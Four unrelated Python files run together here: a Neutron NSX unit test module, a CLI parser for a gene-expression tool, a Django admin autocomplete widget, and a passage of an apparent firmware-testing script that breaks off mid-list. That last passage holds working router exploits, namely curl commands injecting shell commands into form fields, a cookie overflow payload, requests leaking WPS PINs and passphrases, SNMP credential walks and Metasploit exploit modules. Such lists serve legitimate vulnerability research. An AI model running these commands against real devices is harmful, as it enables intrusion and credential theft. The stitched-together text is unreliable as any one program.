from neutron.plugins.vmware.nsxlib import lsn as lsnlib
from neutron.tests import base
class LSNTestCase(base.BaseTestCase):
def setUp(self):
super(LSNTestCase, self).setUp()
self.mock_request_p = mock.patch.object(lsnlib, 'do_request')
self.mock_request = self.mock_request_p.start()
self.cluster = mock.Mock()
self.cluster.default_service_cluster_uuid = 'foo'
self.addCleanup(self.mock_request_p.stop)
def test_service_cluster_None(self):
self.mock_request.return_value = None
expected = lsnlib.service_cluster_exists(None, None)
self.assertFalse(expected)
def test_service_cluster_found(self):
self.mock_request.return_value = {
"results": [
{
"_href": "/ws.v1/service-cluster/foo_uuid",
"display_name": "foo_name",
"uuid": "foo_uuid",
"tags": [],
"_schema": "/ws.v1/schema/ServiceClusterConfig",
"gateways": []
}
],
"result_count": 1
}
expected = lsnlib.service_cluster_exists(None, 'foo_uuid')
self.assertTrue(expected)
def test_service_cluster_not_found(self):
self.mock_request.side_effect = exceptions.NotFound()
expected = lsnlib.service_cluster_exists(None, 'foo_uuid')
self.assertFalse(expected)
def test_lsn_for_network_create(self):
net_id = "foo_network_id"
tags = utils.get_tags(n_network_id=net_id)
obj = {"service_cluster_uuid": "foo", "tags": tags}
lsnlib.lsn_for_network_create(self.cluster, net_id)
self.mock_request.assert_called_once_with(
"POST", "/ws.v1/lservices-node",
json.dumps(obj), cluster=self.cluster)
def test_lsn_for_network_get(self):
net_id = "foo_network_id"
lsn_id = "foo_lsn_id"
self.mock_request.return_value = {
"results": [{"uuid": "foo_lsn_id"}],
"result_count": 1
}
result = lsnlib.lsn_for_network_get(self.cluster, net_id)
self.assertEqual(lsn_id, result)
self.mock_request.assert_called_once_with(
"GET",
("/ws.v1/lservices-node?fields=uuid&tag_scope="
"n_network_id&tag=%s" % net_id),
cluster=self.cluster)
def test_lsn_for_network_get_none(self):
net_id = "foo_network_id"
self.mock_request.return_value = {
"results": [{"uuid": "foo_lsn_id1"}, {"uuid": "foo_lsn_id2"}],
"result_count": 2
}
result = lsnlib.lsn_for_network_get(self.cluster, net_id)
self.assertIsNone(result)
def test_lsn_for_network_get_raise_not_found(self):
net_id = "foo_network_id"
self.mock_request.return_value = {
"results": [], "result_count": 0
}
self.assertRaises(exceptions.NotFound,
lsnlib.lsn_for_network_get,
self.cluster, net_id)
def test_lsn_delete(self):
lsn_id = "foo_id"
lsnlib.lsn_delete(self.cluster, lsn_id)
self.mock_request.assert_called_once_with(
"DELETE",
"/ws.v1/lservices-node/%s" % lsn_id, cluster=self.cluster)
def _test_lsn_port_host_entries_update(self, lsn_type, hosts_data):
lsn_id = 'foo_lsn_id'
lsn_port_id = 'foo_lsn_port_id'
lsnlib.lsn_port_host_entries_update(
self.cluster, lsn_id, lsn_port_id, lsn_type, hosts_data)
self.mock_request.assert_called_once_with(
'PUT',
'/ws.v1/lservices-node/%s/lport/%s/%s' % (lsn_id,
lsn_port_id,
lsn_type),
json.dumps({'hosts': hosts_data}),
cluster=self.cluster)
def test_lsn_port_dhcp_entries_update(self):
hosts_data = [{"ip_address": "11.22.33.44",
"mac_address": "aa:bb:cc:dd:ee:ff"},
{"ip_address": "44.33.22.11",
"mac_address": "ff:ee:dd:cc:bb:aa"}]
self._test_lsn_port_host_entries_update("dhcp", hosts_data)
def test_lsn_port_metadata_entries_update(self):
hosts_data = [{"ip_address": "11.22.33.44",
"device_id": "foo_vm_uuid"}]
self._test_lsn_port_host_entries_update("metadata-proxy", hosts_data)
def test_lsn_port_create(self):
port_data = {
"ip_address": "1.2.3.0/24",
"mac_address": "aa:bb:cc:dd:ee:ff",
"subnet_id": "foo_subnet_id"
}
port_id = "foo_port_id"
self.mock_request.return_value = {"uuid": port_id}
lsn_id = "foo_lsn_id"
result = lsnlib.lsn_port_create(self.cluster, lsn_id, port_data)
self.assertEqual(result, port_id)
tags = utils.get_tags(n_subnet_id=port_data["subnet_id"],
n_mac_address=port_data["mac_address"])
port_obj = {
"ip_address": port_data["ip_address"],
"mac_address": port_data["mac_address"],
"type": "LogicalServicesNodePortConfig",
"tags": tags
}
self.mock_request.assert_called_once_with(
"POST", "/ws.v1/lservices-node/%s/lport" % lsn_id,
json.dumps(port_obj), cluster=self.cluster)
def test_lsn_port_delete(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_port_id"
lsnlib.lsn_port_delete(self.cluster, lsn_id, lsn_port_id)
self.mock_request.assert_called_once_with(
"DELETE",
"/ws.v1/lservices-node/%s/lport/%s" % (lsn_id, lsn_port_id),
cluster=self.cluster)
def test_lsn_port_get_with_filters(self):
lsn_id = "foo_lsn_id"
port_id = "foo_port_id"
filters = {"tag": "foo_tag", "tag_scope": "foo_scope"}
self.mock_request.return_value = {
"results": [{"uuid": port_id}],
"result_count": 1
}
result = lsnlib._lsn_port_get(self.cluster, lsn_id, filters)
self.assertEqual(result, port_id)
self.mock_request.assert_called_once_with(
"GET",
("/ws.v1/lservices-node/%s/lport?fields=uuid&tag_scope=%s&"
"tag=%s" % (lsn_id, filters["tag_scope"], filters["tag"])),
cluster=self.cluster)
def test_lsn_port_get_with_filters_return_none(self):
self.mock_request.return_value = {
"results": [{"uuid": "foo1"}, {"uuid": "foo2"}],
"result_count": 2
}
result = lsnlib._lsn_port_get(self.cluster, "lsn_id", None)
self.assertIsNone(result)
def test_lsn_port_get_with_filters_raises_not_found(self):
self.mock_request.return_value = {"results": [], "result_count": 0}
self.assertRaises(exceptions.NotFound,
lsnlib._lsn_port_get,
self.cluster, "lsn_id", None)
def test_lsn_port_info_get(self):
self.mock_request.return_value = {
"tags": [
{"scope": "n_mac_address", "tag": "fa:16:3e:27:fd:a0"},
{"scope": "n_subnet_id", "tag": "foo_subnet_id"},
],
"mac_address": "aa:bb:cc:dd:ee:ff",
"ip_address": "0.0.0.0/0",
"uuid": "foo_lsn_port_id"
}
result = lsnlib.lsn_port_info_get(
self.cluster, 'foo_lsn_id', 'foo_lsn_port_id')
self.mock_request.assert_called_once_with(
'GET', '/ws.v1/lservices-node/foo_lsn_id/lport/foo_lsn_port_id',
cluster=self.cluster)
self.assertIn('subnet_id', result)
self.assertIn('mac_address', result)
def test_lsn_port_info_get_raise_not_found(self):
self.mock_request.side_effect = exceptions.NotFound
self.assertRaises(exceptions.NotFound,
lsnlib.lsn_port_info_get,
self.cluster, mock.ANY, mock.ANY)
def test_lsn_port_plug_network(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
lswitch_port_id = "foo_lswitch_port_id"
lsnlib.lsn_port_plug_network(
self.cluster, lsn_id, lsn_port_id, lswitch_port_id)
self.mock_request.assert_called_once_with(
"PUT",
("/ws.v1/lservices-node/%s/lport/%s/"
"attachment") % (lsn_id, lsn_port_id),
json.dumps({"peer_port_uuid": lswitch_port_id,
"type": "PatchAttachment"}),
cluster=self.cluster)
def test_lsn_port_plug_network_raise_conflict(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
lswitch_port_id = "foo_lswitch_port_id"
self.mock_request.side_effect = api_exc.Conflict
self.assertRaises(
nsx_exc.LsnConfigurationConflict,
lsnlib.lsn_port_plug_network,
self.cluster, lsn_id, lsn_port_id, lswitch_port_id)
def _test_lsn_port_dhcp_configure(
self, lsn_id, lsn_port_id, is_enabled, opts):
lsnlib.lsn_port_dhcp_configure(
self.cluster, lsn_id, lsn_port_id, is_enabled, opts)
opt_array = ["%s=%s" % (key, val) for key, val in opts.iteritems()]
self.mock_request.assert_has_calls([
mock.call("PUT", "/ws.v1/lservices-node/%s/dhcp" % lsn_id,
json.dumps({"enabled": is_enabled}),
cluster=self.cluster),
mock.call("PUT",
("/ws.v1/lservices-node/%s/"
"lport/%s/dhcp") % (lsn_id, lsn_port_id),
json.dumps({"options": {"options": opt_array}}),
cluster=self.cluster)
])
def test_lsn_port_dhcp_configure_empty_opts(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
is_enabled = False
opts = {}
self._test_lsn_port_dhcp_configure(
lsn_id, lsn_port_id, is_enabled, opts)
def test_lsn_port_dhcp_configure_with_opts(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
is_enabled = True
opts = {"opt1": "val1", "opt2": "val2"}
self._test_lsn_port_dhcp_configure(
lsn_id, lsn_port_id, is_enabled, opts)
def _test_lsn_metadata_configure(
self, lsn_id, is_enabled, opts, expected_opts):
lsnlib.lsn_metadata_configure(
self.cluster, lsn_id, is_enabled, opts)
lsn_obj = {"enabled": is_enabled}
lsn_obj.update(expected_opts)
self.mock_request.assert_has_calls([
mock.call("PUT",
"/ws.v1/lservices-node/%s/metadata-proxy" % lsn_id,
json.dumps(lsn_obj),
cluster=self.cluster),
])
def test_lsn_port_metadata_configure_empty_secret(self):
lsn_id = "foo_lsn_id"
is_enabled = True
opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775"
}
expected_opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775",
"misc_options": []
}
self._test_lsn_metadata_configure(
lsn_id, is_enabled, opts, expected_opts)
def test_lsn_metadata_configure_with_secret(self):
lsn_id = "foo_lsn_id"
is_enabled = True
opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775",
"metadata_proxy_shared_secret": "foo_secret"
}
expected_opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775",
"misc_options": ["metadata_proxy_shared_secret=foo_secret"]
}
self._test_lsn_metadata_configure(
lsn_id, is_enabled, opts, expected_opts)
def _test_lsn_port_host_action(
self, lsn_port_action_func, extra_action, action, host):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
lsn_port_action_func(self.cluster, lsn_id, lsn_port_id, host)
self.mock_request.assert_called_once_with(
"POST",
("/ws.v1/lservices-node/%s/lport/"
"%s/%s?action=%s") % (lsn_id, lsn_port_id, extra_action, action),
json.dumps(host), cluster=self.cluster)
def test_lsn_port_dhcp_host_add(self):
host = {
"ip_address": "1.2.3.4",
"mac_address": "aa:bb:cc:dd:ee:ff"
}
self._test_lsn_port_host_action(
lsnlib.lsn_port_dhcp_host_add, "dhcp", "add_host", host)
def test_lsn_port_dhcp_host_remove(self):
host = {
"ip_address": "1.2.3.4",
"mac_address": "aa:bb:cc:dd:ee:ff"
}
self._test_lsn_port_host_action(
lsnlib.lsn_port_dhcp_host_remove, "dhcp", "remove_host", host)
def test_lsn_port_metadata_host_add(self):
host = {
"ip_address": "1.2.3.4",
"instance_id": "foo_instance_id"
}
self._test_lsn_port_host_action(lsnlib.lsn_port_metadata_host_add,
"metadata-proxy", "add_host", host)
def test_lsn_port_metadata_host_remove(self):
host = {
"ip_address": "1.2.3.4",
"instance_id": "foo_instance_id"
}
self._test_lsn_port_host_action(lsnlib.lsn_port_metadata_host_remove,
"metadata-proxy", "remove_host", host)
|
|
import argparse
from pathlib import Path
from methods import Method
from models import SampleCollection, Experiment
from declarative_parser import Parser, Argument
from declarative_parser.types import Slice, one_of, Indices, dsv, Range
from declarative_parser.constructor_parser import ConstructorParser
class SampleCollectionFactory(Parser):
"""Provide {parser_name} samples. Requires a file (or files) with samples.
The files should come in Delimiter Separated Values format
(like .csv or .tsv). The default delimiter is a tab character.
The first column of each file should contain gene identifiers.
To use only a subset of samples from files(s) specify column numbers
(--columns) or sample names (--samples) of desired samples.
"""
files = Argument(
type=argparse.FileType('r'),
# at least one file is always required
nargs='+',
optional=False
)
name = Argument(help='Your custom name for this set of samples.')
samples = Argument(
type=dsv(str),
nargs='*',
as_many_as=files,
help='Names of samples (columns) to be extracted from the file. '
'Sample names are determined from the first non-empty row. '
'Use a comma to separate samples. '
'Samples for each of files should be separated by space.'
)
columns = Argument(
# we want to handle either ":4", "5:" or even "1,2,3"
type=one_of(Slice, Indices, Range),
# user may (but do not have to) specify columns
# to be extracted from given file(s).
nargs='*',
as_many_as=files,
help='Columns to be extracted from files: '
'either a comma delimited list of 0-based numbers (e.g. 0,2,3) '
'or a range defined using Python slice notation (e.g. 3:10). '
'Columns for each of files should be separated by space.'
)
delimiter = Argument(
default='\t',
help='Delimiter of the provided file(s). Default: tabulation mark.'
)
header = Argument(
nargs='*',
type=one_of(int, str),
as_many_as=files,
default=lambda file_object: 0,
help='Defines how the sample names should be created. '
'Provide a number to specify which line should be used '
'to extract names for samples. Please remember that '
'empty lines will be skipped. If your file has no row '
'with sample names, provide a string to be used as a '
'prefix for naming consecutive samples. '
'For example, `--header cancer` will lead to naming '
'all relevant samples like: cancer_1, cancer_2, etc. '
'Default: create sample names from first non-empty '
'line in the file.'
)
description_column = Argument(
short='d',
action='store_true',
help='Enable this switch, if there is a column with columns '
'descriptions (the column has to be on position two, '
'i.e. immediately after gene identifiers). By default '
'it is assumed that there is no such column.'
)
constructors_by_ext = {
'tsv': SampleCollection.from_file,
'csv': SampleCollection.from_csv_file,
'gct': SampleCollection.from_gct_file
}
deduce_format = Argument(
type=bool,
default=True,
help='Deduce file format and automatically set the best '
'parsing parameters. The format will be inferred from '
'extension of the provided file(s). '
f'Following formats are supported: {constructors_by_ext}. '
'Default: true.'
)
def produce(self, unknown_args=None):
opts = self.namespace
name = opts.name or self.name
if opts.files:
# load all files
sample_collections = []
if callable(opts.header):
opts.header = [opts.header(f) for f in opts.files]
for i, file_obj in enumerate(opts.files):
use_header = isinstance(opts.header[i], int)
constructor = SampleCollection.from_file
if opts.deduce_format:
extension = Path(file_obj.name).suffix[1:]
if extension in self.constructors_by_ext:
constructor = self.constructors_by_ext[extension]
sample_collections.append(
constructor(
f'Sample collection, part {i} of {name}',
file_obj,
columns_selector=opts.columns[i].get_iterator if opts.columns else None,
samples=opts.samples[i] if opts.samples else None,
reverse_selection=getattr(opts, 'reverse', False),
delimiter=opts.delimiter,
header_line=opts.header[i] if use_header else None,
use_header=use_header,
prefix=opts.header[i] if not use_header else None,
description_column=opts.description_column
)
)
opts.sample_collection = sum(sample_collections, SampleCollection(name))
return opts
class SingleFileExperimentFactory(Parser):
"""Provide both: case and control samples from a single file.
This is just a shortcut for specifying the same file for both:
case and control samples sets. You have to provide --case or
--control (or both) to specify which columns contain controls.
If you specify only one of --case and --control, it will be
assumed that all other columns should be used for the other
set of samples (if you use `--case 0,1,2` and your file has
five columns with samples, then columns three and four will
be used to create control samples).
To enable more advanced features, please use `control`&`case`
options (instead of the currently selected `data` sub-parser).
"""
# exactly one file is required
files = Argument(
type=argparse.FileType('r'),
nargs=1, # transforms result into a single-element list
optional=False,
help='file with samples for both control and cases.'
)
case = Argument(
type=one_of(Slice, Indices, Range),
nargs=1,
help='columns from which case samples should be extracted.'
)
control = Argument(
type=one_of(Slice, Indices, Range),
nargs=1,
help='columns from which control samples should be extracted.',
)
def produce(self, unknown_args=None):
opts = self.namespace
def produce_collection_of_samples(created_group, other_group):
reverse = hasattr(opts, 'reverse_' + created_group)
get_columns_from = created_group
if reverse:
get_columns_from = other_group
return SampleCollectionFactory(
name=created_group,
files=opts.files,
columns=getattr(opts, get_columns_from),
reverse=reverse
).produce()
if opts.files:
if not (opts.case and opts.control):
if opts.case:
opts.reverse_control = True
elif opts.control:
opts.reverse_case = True
else:
raise ValueError(
'Neither --case nor --control provided: '
'please specify which columns should be used as control '
'and which should be used as the case.'
)
collections = {
'control': produce_collection_of_samples('control', 'case')
}
# reuse the same file(s)
for f in opts.files:
f.seek(0)
collections['case'] = produce_collection_of_samples('case', 'control')
for name, sample_collection in collections.items():
setattr(opts, name, sample_collection)
return opts
class CLIExperiment(Parser):
"""Use both: case and control or data to create an Experiment."""
__pull_to_namespace_above__ = True
__skip_if_absent__ = False
control = SampleCollectionFactory()
case = SampleCollectionFactory()
data = SingleFileExperimentFactory()
def produce(self, unknown_args=None):
opts = self.namespace
if opts.data:
if opts.control or opts.case:
raise ValueError('Cannot handle data and case/control at once')
opts.case = self.data.namespace.case
opts.control = self.data.namespace.control
elif opts.case and opts.control:
# that's nice :)
pass
elif opts.case:
raise ValueError('Control has not been provided!')
elif opts.control:
raise ValueError('Case has not been provided!')
else:
raise ValueError('Neither data nor (case & control) have been provided!')
del opts.data
opts.experiment = Experiment(opts.case.sample_collection, opts.control.sample_collection)
return opts
class CLI(Parser):
"""The main parser, the one exposed directly to the user."""
method_name = Argument(choices=Method.members, name='method', optional=False)
experiment = CLIExperiment()
__parsing_order__ = 'breadth-first'
@staticmethod
def create_method(name):
# first - take an appropriate method class
method = Method.members[name]
# initialize parser for this method
# (different methods require different arguments)
method_parser = ConstructorParser(constructor=method)
return method_parser
def parse_args(self, args):
help_args = {'-h', '--help'}
if help_args.intersection(args):
args_without_help = [
arg
for arg in args
if arg not in help_args
]
if len(args_without_help) != 0:
name = args_without_help[0]
# in case of a conflict, help for both (for a sub-parser
# and for a method) should be displayed.
methods = {
name: ConstructorParser(constructor=method)
for name, method in Method.members.items()
}
def match_parser(subparsers):
return subparsers.get(name, None)
all_subparsers = [methods, self.subparsers, self.lifted_parsers]
for parser in filter(bool, map(match_parser, all_subparsers)):
return parser.parse_args(args_without_help[1:] + ['-h'])
return super().parse_args(args)
def produce(self, unknown_args):
options = self.namespace
method_parser = self.create_method(options.method)
# parse arguments
method_options, remaining_unknown_args = method_parser.parse_known_args(unknown_args)
for argument in unknown_args[:]:
if argument not in remaining_unknown_args:
unknown_args.remove(argument)
# and initialize the method with these arguments
options.method = method_parser.constructor(**vars(method_options))
return options
|
|
#
# Autocomplete feature for admin panel
#
# Most of the code has been written by Jannis Leidel:
# http://jannisleidel.com/2008/11/autocomplete-form-widget-foreignkey-model-fields/
#
# to_string_function, Satchmo adaptation and some comments added by emes (Michal Salaban)
#
from django import forms
from django.db import models
from django.db.models.query import QuerySet
from django.conf import settings
from django.contrib import admin
from django.http import HttpResponse, HttpResponseNotFound
from django.utils.encoding import smart_str
from django.utils.safestring import mark_safe
from django.utils.text import truncate_words
from django.utils.functional import update_wrapper
# Commenting out for Django 1.3 compatibility
# TODO: Need to find long term solution
#from django.contrib.admin.templatetags.admin_static import static
import operator
class ForeignKeySearchInput(forms.HiddenInput):
"""
A Widget for displaying ForeignKeys in an autocomplete search input
instead in a <select> box.
"""
to_string_function = lambda s: truncate_words(s, 14)
class Media:
css = {
'all': ('css/jquery.autocomplete.css',)
}
js = (
# The js/jquery.js script is referenced in admin/base_site.html template.
# Requesting it here again would reset all the plugins loaded afterwards.
'js/jquery.bgiframe.js',
'js/jquery.ajaxQueue.js',
'js/jquery.autocomplete.js'
)
def label_for_value(self, value):
key = self.rel.get_related_field().name
obj = self.rel.to._default_manager.get(**{key: value})
return self.to_string_function(obj)
def __init__(self, rel, search_fields, to_string_function, attrs=None):
self.rel = rel
self.search_fields = search_fields
if to_string_function: self.to_string_function = to_string_function
super(ForeignKeySearchInput, self).__init__(attrs)
def render(self, name, value, attrs=None):
if attrs is None:
attrs = {}
rendered = super(ForeignKeySearchInput, self).render(name, value, attrs)
if value:
label = self.label_for_value(value)
else:
label = u''
return rendered + mark_safe(u'''
<style type="text/css" media="screen">
#lookup_%(name)s {
padding-right:16px;
background: url(
%(admin_media_prefix)simg/admin/selector-search.gif
) no-repeat right;
}
#del_%(name)s {
display: none;
}
</style>
<input type="text" id="lookup_%(name)s" value="%(label)s"/>
<a href="#" id="del_%(name)s">
<img src="%(admin_media_prefix)simg/admin/icon_deletelink.gif" />
</a>
<script type="text/javascript">
var lookup = $('#lookup_%(name)s')
if (lookup.val()) {
$('#del_%(name)s').show()
}
lookup.attr('size', Math.max(40, lookup.attr('value').length))
lookup.autocomplete('../search/', {
formatResult: function(data){ return $('<div />').html(data[0]).text(); },
extraParams: {
search_fields: '%(search_fields)s',
app_label: '%(app_label)s',
model_name: '%(model_name)s'
}
}).result(function(event, data, formatted) {
if (data) {
$('#id_%(name)s').val(data[1]);
$('#del_%(name)s').show();
}
});
$('#del_%(name)s').click(function(ele, event) {
$('#id_%(name)s').val('');
$('#del_%(name)s').hide();
$('#lookup_%(name)s').val('');
});
</script>
''') % {
'search_fields': ','.join(self.search_fields),
'admin_media_prefix': settings.ADMIN_MEDIA_PREFIX,
'model_name': self.rel.to._meta.module_name,
'app_label': self.rel.to._meta.app_label,
'label': label,
'name': name,
}
class AutocompleteAdmin(admin.ModelAdmin):
"""Admin class for models using the autocomplete feature.
There are two additional fields:
- related_search_fields: defines fields of managed model that
have to be represented by autocomplete input, together with
a list of target model fields that have to be searched for
input string,
- related_string_functions: contains optional functions which
take target model instance as only argument and return string
representation. By default __unicode__() method of target
object is used.
"""
related_search_fields = {}
related_string_functions = {}
def __call__(self, request, url):
# This is deprecated interface and will be dropped in Django 1.3.
# Since the version 1.1, Django uses get_urls() method below.
if url is None:
pass
elif url == 'search':
return self.search(request)
return super(AutocompleteAdmin, self).__call__(request, url)
def get_urls(self):
from django.conf.urls.defaults import url
def wrap(view):
# This is needed to secure the view so that only admin users can access
def wrapper(*args, **kwargs):
return self.admin_site.admin_view(view)(*args, **kwargs)
return update_wrapper(wrapper, view)
patterns = super(AutocompleteAdmin, self).get_urls()
info = self.admin_site.name, self.model._meta.app_label, self.model._meta.module_name
patterns.insert(
-1, # insert just before (.+) rule (see django.contrib.admin.options.ModelAdmin.get_urls)
url(r'^search/$',
wrap(self.search),
name='%sadmin_%s_%s_search' % info
)
)
return patterns
def search(self, request):
"""
Searches in the fields of the given related model and returns the
result as a simple string to be used by the jQuery Autocomplete plugin
"""
query = request.GET.get('q', None)
app_label = request.GET.get('app_label', None)
model_name = request.GET.get('model_name', None)
search_fields = request.GET.get('search_fields', None)
try:
to_string_function = self.related_string_functions[model_name]
except KeyError:
to_string_function = lambda x: x.__unicode__()
if search_fields and app_label and model_name and query:
def construct_search(field_name):
# use different lookup methods depending on the notation
if field_name.startswith('^'):
return "%s__istartswith" % field_name[1:]
elif field_name.startswith('='):
return "%s__iexact" % field_name[1:]
elif field_name.startswith('@'):
return "%s__search" % field_name[1:]
else:
return "%s__icontains" % field_name
model = models.get_model(app_label, model_name)
qs = model._default_manager.all()
for bit in query.split():
or_queries = [models.Q(**{construct_search(
smart_str(field_name)): smart_str(bit)})
for field_name in search_fields.split(',')]
other_qs = QuerySet(model)
other_qs.dup_select_related(qs)
other_qs = other_qs.filter(reduce(operator.or_, or_queries))
qs = qs & other_qs
data = ''.join([u'%s|%s\n' % (to_string_function(f), f.pk) for f in qs])
return HttpResponse(data)
return HttpResponseNotFound()
def formfield_for_dbfield(self, db_field, **kwargs):
"""
Overrides the default widget for Foreignkey fields if they are
specified in the related_search_fields class attribute.
"""
if isinstance(db_field, models.ForeignKey) and \
db_field.name in self.related_search_fields:
kwargs['widget'] = ForeignKeySearchInput(
db_field.rel,
self.related_search_fields[db_field.name],
self.related_string_functions.get(db_field.name),
)
field = super(AutocompleteAdmin, self).formfield_for_dbfield(db_field, **kwargs)
return field
|
|
#!/usr/bin/env python
import os
import sys
import getopt
import subprocess
import contextlib
import psycopg2
SHELL_EXPLOITS = {
200 : ("curl -L --max-redir 0 -m 5 -s -f -X POST -d \"macAddress=000000000000;cat DEADBEEF1;®info=1&writeData=Submit\" http://%(target)s/boardData102.php", "grep -qs \"DEADBEEF1\" qemu.serial"), # CVE-2016-1555
201 : ("curl -L --max-redir 0 -m 5 -s -f -X POST -d \"macAddress=000000000000;cat DEADBEEF2;®info=1&writeData=Submit\" http://%(target)s/boardData103.php", "grep -qs \"DEADBEEF2\" qemu.serial"), # CVE-2016-1555
202 : ("curl -L --max-redir 0 -m 5 -s -f http://%(target)s/ROM-0", ""), # https://rootatnasro.wordpress.com/2014/01/11/how-i-saved-your-a-from-the-zynos-rom-0-attack-full-disclosure/
203 : ("curl -L --max-redir 0 -m 5 -s -f -b dlink_uid=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA http://%(target)s/session_login.php", "grep -qs \"BadVA : 41414141\" qemu.serial"), # CVE-2016-1558
204 : ("curl -L --max-redir 0 -m 5 -s -f -X POST -d \"macAddress=000000000000;cat DEADBEEF3;®info=1&writeData=Submit\" http://%(target)s/boardDataJP.php", "grep -qs \"DEADBEEF3\" qemu.serial"), # CVE-2016-1555
205 : ("curl -L --max-redir 0 -m 5 -s -f -X POST -d \"macAddress=000000000000;cat DEADBEEF4;®info=1&writeData=Submit\" http://%(target)s/boardDataNA.php", "grep -qs \"DEADBEEF4\" qemu.serial"), # CVE-2016-1555
206 : ("curl -L --max-redir 0 -m 5 -s -f -X POST -d \"macAddress=000000000000;cat DEADBEEF5;®info=1&writeData=Submit\" http://%(target)s/boardDataWW.php", "grep -qs \"DEADBEEF5\" qemu.serial"), # CVE-2016-1555
207 : ("curl -L --max-redir 0 -m 5 -s -f http://%(target)s/getBoardConfig.php", "grep -qs -e \"WPS PIN\" -e \"PASSPHRASE\" %(output)s"), # CVE-2016-1556
# 208 : ("curl -L --max-redir 0 -m 5 -s -f \"http://%(target)s/mfgwrite.php?product=;cat DEADBEEF6\"", "grep -qs \"DEADBEEF6\" qemu.serial"),
209 : ("snmpwalk -v2c -c public %(target)s .iso", "grep -qs \".2.1.3.3.2.1.1.4\" %(output)s"), # CVE-2016-1559
210 : ("snmpwalk -v2c -c public %(target)s .iso", "grep -qs \".4.1.1.1\" %(output)s "), # CVE-2016-1559
211 : ("snmpwalk -v2c -c public %(target)s iso.3.6.1.4.1.4526.100.7.8.1.5", ""), # CVE-2016-1557
212 : ("snmpwalk -v2c -c public %(target)s iso.3.6.1.4.1.4526.100.7.9.1.5", ""), # CVE-2016-1557
213 : ("snmpwalk -v2c -c public %(target)s iso.3.6.1.4.1.4526.100.7.9.1.7", ""), # CVE-2016-1557
214 : ("snmpwalk -v2c -c public %(target)s iso.3.6.1.4.1.4526.100.7.10.1.7", ""), # CVE-2016-1557
# 215 : ("curl -L --max-redir 0 -m 5 -s -f http://%(target)s/userRpmNatDebugRpm26525557/linux_cmdline.html", ""), # http://websec.ca/advisories/view/root-shell-tplink-wdr740
}
METASPLOIT_EXPLOITS = {
0 : "use exploits/linux/http/airties_login_cgi_bof",
1 : "use exploits/linux/http/belkin_login_bof",
2 : "use exploits/linux/http/ddwrt_cgibin_exec",
3 : "use exploits/linux/http/dlink_authentication_cgi_bof",
4 : "use exploits/linux/http/dlink_command_php_exec_noauth",
5 : "use exploits/linux/http/dlink_diagnostic_exec_noauth",
6 : "use exploits/linux/http/dlink_dir300_exec_telnet",
7 : "use exploits/linux/http/dlink_dir605l_captcha_bof",
8 : "use exploits/linux/http/dlink_dir615_up_exec",
9 : "use exploits/linux/http/dlink_dspw110_cookie_noauth_exec",
10 : "use exploits/linux/http/dlink_dspw215_info_cgi_bof",
11 : "use exploits/linux/http/dlink_hedwig_cgi_bof",
12 : "use exploits/linux/http/dlink_hnap_bof",
13 : "use exploits/linux/http/dlink_hnap_header_exec_noauth",
14 : "use exploits/linux/http/dlink_upnp_exec_noauth",
# 15 : "use exploits/router/dreambox_openpli_shell",
16 : "use exploits/linux/http/fritzbox_echo_exec",
17 : "use exploits/linux/http/linksys_apply_cgi",
# 18 : "use exploits/linux/http/linksys_e1500_apply_exec",
19 : "use exploits/linux/http/linksys_themoon_exec",
# 20 : "use exploits/linux/http/linksys_wrt54gl_apply_exec",
# 21 : "use exploits/linux/http/linksys_wrt110_cmd_exec",
# 22 : "use exploits/linux/http/linksys_wrt160nv2_apply_exec",
23 : "use exploits/linux/http/multi_ncc_ping_exec",
24 : "use exploits/linux/http/netgear_dgn1000b_setup_exec",
# 25 : "use exploits/linux/http/netgear_dgn2200b_pppoe_exec",
26 : "use exploits/linux/http/netgear_readynas_exec",
27 : "use exploits/linux/http/realtek_miniigd_upnp_exec_noauth",
28 : "use exploits/linux/http/seagate_nas_php_exec_noauth",
29 : "use exploits/linux/misc/sercomm_exec",
30 : "use exploits/linux/upnp/dlink_upnp_msearch_exec",
31 : "use exploits/linux/upnp/miniupnpd_soap_bof",
32 : "use exploits/multi/http/cisco_dcnm_upload",
33 : "use exploits/multi/upnp/libupnp_ssdp_overflow",
# 34 : "use exploits/unix/dhcp/bash_environment",
# 35 : "use auxiliary/router/cisco_secure_acs_bypass",
36 : "use auxiliary/admin/cisco/vpn_3000_ftp_bypass",
37 : "use auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss",
38 : "use auxiliary/admin/http/dlink_dir_300_600_exec_noauth",
39 : "use auxiliary/admin/http/dlink_dir_645_password_extractor",
40 : "use auxiliary/admin/http/dlink_dsl320b_password_extractor",
41 : "use auxiliary/admin/http/intersil_pass_reset",
# 42 : "use auxiliary/admin/http/linksys_e1500_e2500_exec",
43 : "use exploits/router/linksys_tmunblock_admin_reset_bof",
# 44 : "use auxiliary/admin/http/linksys_wrt54gl_exec",
45 : "use auxiliary/admin/http/netgear_soap_password_extractor",
46 : "use auxiliary/admin/http/zyxel_admin_password_extractor",
47 : "use auxiliary/admin/misc/sercomm_dump_config",
48 : "use auxiliary/admin/motorola/wr850g_cred",
49 : "use auxiliary/admin/vxworks/apple_airport_extreme_password",
50 : "use auxiliary/admin/vxworks/dlink_i2eye_autoanswer",
51 : "use auxiliary/admin/vxworks/wdbrpc_memory_dump",
52 : "use auxiliary/admin/vxworks/wdbrpc_reboot",
53 : "use auxiliary/dos/cisco/ios_http_percentpercent",
54 : "use auxiliary/dos/dhcp/isc_dhcpd_clientid\nset RIP %(target)s",
# 55 : "use auxiliary/router/ntpd_reserved_dos",
